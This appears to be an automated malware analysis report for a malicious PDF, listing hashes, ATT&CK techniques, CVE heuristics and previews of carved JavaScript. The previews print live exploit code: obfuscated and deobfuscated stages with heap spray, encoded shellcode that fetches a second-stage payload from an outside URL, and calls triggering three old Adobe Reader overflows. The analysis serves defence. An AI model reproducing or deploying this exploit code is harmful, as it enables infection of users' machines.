Malicious PDF — malware analysis report

Static analysis result for SHA-256 77d3d40cbb30f590…

MALICIOUS

PDF

10.6 KB
MD5: 884071243327b666e78d0229fc377336 SHA-1: df0825af27d965a3661debf92fdc3afb35fa3427 SHA-256: 77d3d40cbb30f59081d9ef3957173d49ca0fa6cc1c5b4fb85979ce12f6061919
488 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains JavaScript that leverages multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL 'http://www.nocircle.com/download.php'. The use of unescape() and eval() calls, along with variable concatenation, indicates a deliberate obfuscation technique to hide the malicious payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
51d46c7569f3ef1dcb06fab185b78900791e2744eaef5139d3facd387c22d593		 pdf-javascript-stream PDF /JS object 7 at offset 0x233 46849 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 232 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function RyI(TIK){var FOD=unescape(NZKGK)+unescape(DVlE)+unescape(xcRIU)+unescape(BGjXr)+unescape(RMAEv)+unescape(iWtm)+unescape(rdMVJ)+unescape(uccA)+unescape(mjaA)+unescape(RasS)+unescape(wmivt)+unescape(crDM)+unescape(PUbnb)+unescape(ECLm)+unescape(JoHy)+unescape(zeGNk)+unescape(YqLJM)+unescape(ZudL)+unescape(CVqj)+unescape(nCbm)+unescape(fqAh)+unescape(eQxBd)+unescape(rAwx)+unescape(BTpGt)+unescape(gcxz)+unescape(vKpDN)+unescape(XMfJ)+unescape(lQbux)+unescape(xznw)+unescape(QOEo)+unescape(EKPVp)+unescape(fsqE)+unescape(wbnC)+unescape(OiRY)+unescape(wkFzd)+unescape(KEdrI)+unescape(SPFF)+unescape(mWmtG)+unescape(QAQm)+unescape(TTort)+unescape(YVMY)+unescape(CIyc)+unescape(qsdOV)+unescape(aYnv)+unescape(pOII)+unescape(jnEm)+unescape(HaZCv)+unescape(qxEO)+unescape(YxaCk)+unescape(qAYEN)+unescape(YFwvE)+unescape(weff)+unescape(UJURs)+unescape(ZQrF)+unescape(bNskl)+unescape(KIJhD)+unescape(zLKpG)+unescape(rTin)+unescape(rLGl)+unescape(Fdpr)+unescape(HEmA)+unescape(Oxeg)+unescape(WetX)+unescape(kjidP)+unescape(IQSM)+unescape(YCnW)+unescape(UgRZy)+unescape(aOoQh)+unescape(Yucng)+unescape(fhecg)+unescape(DgRdC)+unescape(ZIed)+unescape(nSQzE)+unescape(IQgIm)+unescape(USgB)+unescape(Behf)+unescape(yqSRx)+unescape(dvZhB)+unescape(Ncpr)+unescape(FZTM)+unescape(zFKIl)+unescape(aTbQ)+unescape(GGdg)+unescape(zQyT)+unescape(JDRU)+unescape(bbEB)+unescape(mCqif)+unescape(teGMo)+unescape(zNmp)+unescape(yHwc)+unescape(SXUNl)+unescape(AEyno)+unescape(lCIL)+unescape(hxLz)+unescape(VSvD)+unescape(GOLrc)+unescape(mFck)+unescape(UQVgJ)+unescape(DuKY)+unescape(pSPb)+unescape(CABYs)+unescape(iJxf)+unescape(WcGYg)+unescape(ipkjy)+unescape(mBLGB)+unescape(ukVi)+unescape(bFCIn)+unescape(AJgk)+unescape(Hlkqw)+unescape(ZPmt)+unescape(BzFTS)+unescape(dTyD)+unescape(fOJq)+unescape(FxdC)+unescape(JchrZ)+unescape(EHfv)+unescape(Viyo)+unescape(BjhI)+unescape(XQup)+unescape(rHKtu)+unescape(OQEq)+unescape(PHMj)+unescape(hWZm)+unescape(xXWFV)+unescape(mHvN)+unescape(OYzz)+unescape(YmAC)+unescape(KzUQQ)+unescape(BYUT)+unescape(ejxEY)+unescape(OugH)+unescape(slpge)+unescape(ivKLW)+unescape(lInDC)+unescape(FVMi)+unescape(pmtd)+unescape(uzItA)+unescape(spzR)+unescape(tIbEK)+unescape(xJkKd)+unescape(bYFU)+unescape(yzMv)+unescape(lJns)+unescape(TLEQ)+unescape(CLkDF)+unescape(dfGhD)+unescape(ffJjO)+unescape(KxZM)+unescape(jzvF)+unescape(JWac)+unescape(mdwsm)+unescape(yjUKP)+unescape(CNKf)+unescape(hXDlk)+unescape(VjAQ)+unescape(kezpL)+unescape(wToF)+unescape(rHiuB)+unescape(AkUoh)+unescape(sUNh)+unescape(hPNi)+unescape(wVABE)+unescape(IJjg)+unescape(IYLzN)+unescape(svAlp)+unescape(MXnnw)+unescape(XTDX)+unescape(VoGnv)+unescape(XeRhN)+unescape(ivXfm)+unescape(TcbyI)+unescape(iwxLF)+unescape(tPUl)+unescape(ctjQY)+unescape(lZjY)+unescape(PKxhZ)+unescape(FSOTN)+unescape(kVeqp)+unescape(ozhsb)+unescape(YrrD)+unescape(YPfxx)+unescape(WvoX)+unescape(eMiWs)+unescape(OjiP)+unescape(gNuT)+unescape(UAQH)+unescape(NASfz)+unescape(YMLVy)+unescape(Agjk)+unescape(kvnLe)+unescape(jyRj)+unescape(DQRB)+unescape(yEbPQ)+unescape(mkED)+unescape(RDwF)+unescape(BbCf)+unescape(DHCT)+unescape(UCtx)+unescape(QcMK)+unescape(NOymj)+unescape(nvbTl)+unescape(cLnQI)+unescape(SWZdI)+unescape(kHTBl)+unescape(HCfnS)+unescape(pfwYn)+unescape(TDpjY)+unescape(NsSWc)+unescape(gAUSp)+unescape(IVMmb)+unescape(PksQx)+unescape(Jkfjs)+unescape(XlOwn)+unescape(LktVJ)+unescape(pUrhn)+unescape(WWVd)+unescape(qMEm)+unescape(PEoKn)+unescape(lvVGW)+unescape(GmCL)+unescape(nhkp)+unescape(Adhgi)+unescape(OVdjQ)+unescape(UXnUd)+unescape(avcB)+unescape(rwSEl)+unescape(TCMm)+unescape(uyMk)+unescape(PeVFd)+unescape(KJAG)+unescape(BmaV)+unescape(usyNH);TIK(FOD);}var ivXfm='\u0075\u0032\u0041\u0036\u0034\u005c\u0075\u0032\u0046\u0036\u0043\u005c\u0075\u0036\u0036\u0042\u0046\u005c\u0075\u0043\u0046\u0041\u0041\u005c\u0075\u0031\u0030\u0038\u0037';var tIbEK='\u0034\u0022\u002b\u0022\u0035\u0030\u0022\u002b\u0022\u0030\u0030\u0022\u002b\u0022\u0066\u0022\u002c\u007a\u0058\u006a\u0029\u003b\u007d\u000a\u0066\u0075\u006e\u0063\u0074';var NOymj='\u0075\u0036\u0035\u0037\u0032\u005c\u0075\u0032\u0030\u0037\u0032\u005c\u0075\u
... (truncated)
unescape_var_concat_stage_000.js
16a3ec83df4720190784f15c0f950dc49b49136ee870a98de78d6f8f16bba742		 deobfuscated-js unescape variable-concat decoded JavaScript (decompressed) at offset 0x285 6718 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var apF=unescape,PNP=app.viewerVersion.toString(),qbx=apF("t\h\i\s");qbx=eval(qbx);if(PNP<8)
{DUDfO();}
if(PNP>=8&&PNP<9)
{uXQ();}
if(PNP<=9)
{iZYrq();}
function sWRuF(nmNwB,oDUUJ){while(nmNwB.length*2<oDUUJ){nmNwB+=nmNwB;}
return nmNwB.substring(0,oDUUJ/2);}
function DUDfO(){var AzczU=apF("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u772F\u6E6F\u6369\u7265\u632E\u2F6E\u6F6C\u6461\u702E\u7068\u613F\u613D\u7326\u3D74\u6E49\u6574\u6E72\u7465\u4520\u7078\u6F6C\u6572\u2072\u2E37\u7C30\u6957\u646E\u776F\u2073\u5058\u6526\u323D");var fKmJw=0x0c0c0c0c;var XsxZg=[];var bNLoN=0x400000;var BIhkO=AzczU.length*2;var oDUUJ=bNLoN-(BIhkO+0x38);var nmNwB=apF("\u9090\u9090");nmNwB=sWRuF(nmNwB,oDUUJ);var BPCzm=(fKmJw-0x400000)/bNLoN;for(var CSBLZ=0;CSBLZ<BPCzm;CSBLZ++){XsxZg[CSBLZ]=nmNwB+AzczU;}
var qgiiC=apF("\u0c0c\u0c0c");while(qgiiC.length<44952)qgiiC+=qgiiC;this.collabStore=Collab.collectEmailInfo({subj:"",msg:qgiiC});}
function uXQ(){var bJB=new Array();function hdQ(mFR,Mza){while(mFR.length*2<Mza){mFR+=mFR;}
mFR=mFR.substring(0,Mza/2);return mFR;}
nSd=0x30303030;LTN=apF("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u772F\u6E6F\u6369\u7265\u632E\u2F6E\u6F6C\u6461\u702E\u7068\u613F\u613D\u7326\u3D74\u6E49\u6574\u6E72\u7465\u4520\u7078\u6F6C\u6572\u2072\u2E37\u7C30\u6957\u646E\u776F\u2073\u5058\u6526\u313D");var oJB=0x400000;var Kpj=LTN.length*2;var Mza=oJB-(Kpj+0x38);var mFR=apF("\u9090\u9090");mFR=hdQ(mFR,Mza);var tfH=(nSd-0x400000)/oJB;for(var vbN=0;vbN<tfH;vbN++){bJB[vbN]=mFR+LTN;}
var zXj="53624187044189210578";for(apF=0;apF<138*2;apF++){zXj+="8";}
util.printf("%4"+"50"+"00"+"f",zXj);}
function gKY(DtU)
{DtU=DtU.replace(/[\+1]/g,"0");DtU=DtU.replace(/[\+2]
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.